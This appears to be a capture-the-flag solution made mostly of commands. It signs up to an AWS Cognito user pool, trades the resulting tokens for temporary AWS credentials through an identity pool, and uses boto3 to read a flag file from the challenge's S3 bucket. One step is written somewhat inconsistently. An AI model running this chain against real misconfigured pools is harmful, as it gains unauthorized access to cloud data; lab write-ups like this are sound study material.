to create user
 curl -X POST \
   'https://cognito-idp.us-east-1.amazonaws.com/' \
   -H 'X-Amz-Target: AWSCognitoIdentityProviderService.SignUp' \
   -H 'Content-Type: application/x-amz-json-1.1' \
   -d '{
     "ClientId": "4bjmgsip08ah118ugkau5p946b",
     "Username": "username",
     "Password": "password",
     "UserAttributes": [
       {
         "Name": "email",
         "Value": "email"
       }
     ]
   }'
to get id token
  curl -X POST \
   'https://cognito-idp.us-east-1.amazonaws.com/' \
   -H 'X-Amz-Target: AWSCognitoIdentityProviderService.InitiateAuth' \
   -H 'Content-Type: application/x-amz-json-1.1' \
   -d '{
     "AuthFlow": "USER_PASSWORD_AUTH",
     "ClientId": "4bjmgsip08ah118ugkau5p946b",
     "AuthParameters": {
       "USERNAME": "username",
       "PASSWORD": "password"
     }
   }'
to get identity id
 curl -X POST \
   'https://cognito-identity.us-east-1.amazonaws.com/' \
   -H 'Content-Type: application/x-amz-json-1.1' \
   -d '{
     "IdentityPoolId": "us-east-1:b73a3094-c689-47e2-b9c4-311d5b7ee1ee",
     "Logins": {
       "cognito-idp.us-east-1.amazonaws.com/us-east-1_uSid13Z6L": "identity-id"
     }
   }'
to get credentials like access key , secretkey and session token
  curl -X POST \
   'https://cognito-identity.us-east-1.amazonaws.com/' \
   -H 'X-Amz-Target: AWSCognitoIdentityService.GetCredentialsForIdentity' \
   -H 'Content-Type: application/x-amz-json-1.1' \
   -d '{
     "IdentityId": "us-east-1:1b420a35-fe28-cc57-9062-42643e931ec3",
     "Logins": {
       "cognito-idp.us-east-1.amazonaws.com/us-east-1_uSid13Z6L": "id"
     }
   }'
Then use boto3 to connect
 import boto3
 from botocore.config import Config
 
 
 accesskey = 'accesskey'
 secretkey = 'secretkey'
 sessiontoken = 'session token'
 
 s3 = boto3.client('s3',
                   aws_access_key_id=accesskey,
                   aws_secret_access_key=secretkey,
                   aws_session_token=sessiontoken,
                   region_name='us-east-1',
                   config=Config(signature_version='s3v4'))
 
 r = s3.get_object(Bucket='patriot-ctf-cloud-ctf-challenge', Key='flag.txt')
 flag = r['Body'].read().decode('utf-8')
 print(flag)